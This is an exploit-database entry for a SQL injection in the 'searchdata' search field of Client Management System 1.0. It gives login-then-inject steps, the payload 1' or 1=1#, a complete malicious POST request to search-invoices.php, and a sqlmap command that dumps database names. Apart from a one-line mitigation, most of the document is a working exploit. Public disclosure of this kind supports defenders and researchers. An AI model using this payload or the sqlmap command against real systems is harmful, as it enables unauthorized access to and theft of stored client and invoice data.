Client Management System 1.0 - 'searchdata' SQL injection

vendor:

Client Management System

by:

Serkan Sancar

7.5

CVSS

HIGH

SQL Injection

CWE

Product Name: Client Management System

Affected Version From: 1.0

Affected Version To: 1.0

Patch Exists: N/A

Related CWE: N/A

CPE: a:phpgurukul:client_management_system:1.0

Metasploit: N/A

Other Scripts: N/A

Platforms Tested: Windows 7 Enterprise SP1 + XAMPP V3.2.3

2020

Client Management System 1.0 – ‘searchdata’ SQL injection

A SQL injection vulnerability exists in Client Management System 1.0 when user input is not properly sanitized before being used in an SQL query. An attacker can exploit this vulnerability by sending a malicious request with a payload of '1' or 1=1# in the searchbox field. This can be done by using Burp Suite to send a POST request to the search-invoices.php page. An attacker can also use sqlmap with the -r parameter to exploit this vulnerability.

Mitigation:

Input validation should be used to ensure that user input is properly sanitized before being used in an SQL query.

Source

Exploit-DB raw data:

# Exploit Title: Client Management System 1.0 - 'searchdata' SQL injection
# Date: 26/10/2020
# Exploit Author: Serkan Sancar
# Vendor Homepage: https://phpgurukul.com/client-management-system-using-php-mysql/
# Software Link: https://phpgurukul.com/?smd_process_download=1&download_id=10841
# Version: 1.0
# Tested On: Windows 7 Enterprise SP1 + XAMPP V3.2.3

Step 1: Open the URL http://localhost/clientms/client/index.php

Step 2: Login to client user on panel

Step 3: use check sql injection payload 1' or 1=1# in searchbox field

Malicious Request on burp suite

POST /clientms/client/search-invoices.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/clientms/client/search-invoices.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 210
Origin: http://localhost
Connection: close
Cookie: PHPSESSID=q38d8f3sveqjciu02csdfem453
Upgrade-Insecure-Requests: 1

searchdata=1%27+or+1%3D1%23&search=

Step 4: You will list all invoices and you will had checked sql injection on The Panel.

Example other method:
you saved to inspected package on burp suite. you can exploitation more easily with use sqlmap -r parameter.
sqlmap -r cms.txt --risk=1 --level=1 --dbms=mysql --dbs